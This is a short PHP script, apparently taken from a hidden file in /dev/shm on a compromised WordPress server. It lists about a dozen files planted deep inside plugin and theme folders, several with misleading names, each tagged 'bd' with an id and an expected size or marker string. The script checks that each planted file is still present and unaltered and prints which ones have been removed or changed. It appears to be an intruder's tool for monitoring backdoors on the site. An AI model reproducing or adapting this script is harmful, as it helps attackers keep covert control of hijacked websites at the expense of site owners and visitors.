File: //proc/self/root/dev/shm/.record
<?php $r = '/home/wwwowota/public_html'; $x = ["/wp2/wp-content/plugins/qsm-google-sheets/php/google-apiclient/vendor/google/apiclient-services/src/CloudDebugger/Resource/modform.inc.php"=>"bd@@249364@@1651",
"/wp2/wp-content/plugins/qsm-google-sheets/php/google-apiclient/vendor/google/apiclient-services/src/SearchConsole/tbl_alter.php"=>"bd@@249367@@1788",
"/wp2/wp-content/plugins/wp-phpmyadmin-extension/lib/phpMyAdmin/vendor/pragmarx/google2fa/src/Exceptions/payflowpro.php"=>"bd@@249369@@591",
"/wp2/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/fields/background/field.background.php"=>"bd@@246573@@585",
"/wp2/wp-content/plugins/qsm-google-sheets/php/google-apiclient/vendor/google/apiclient-services/src/Kgsearch/Resource/modifier.default.php"=>"bd@@246647@@1643",
"/wp-content/plugins/gallery_1752229759/singIe.php"=>"bd@@245909@@1105",
"/wp2/wp-content/plugins/cornerstone/includes/views/elements/login-modal.php"=>"bd@@250578@@task_processor",
"/wp2/wp-content/plugins/wc-frontend-manager/views/dashboard/wcfm-view-wcmarketplace-dashboard.php"=>"bd@@250580@@right_pad_string",
"/wp2/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2020-05-31/api.1.json.php"=>"bd@@250591@@748",
"/wp3/wp-content/plugins/woocommerce/templates/myaccount/downloads.php"=>"bd@@249315@@splitter_tool",
"/wp2/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-04-01/paginators-1.json.php"=>"bd@@249361@@token_parser_engine"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');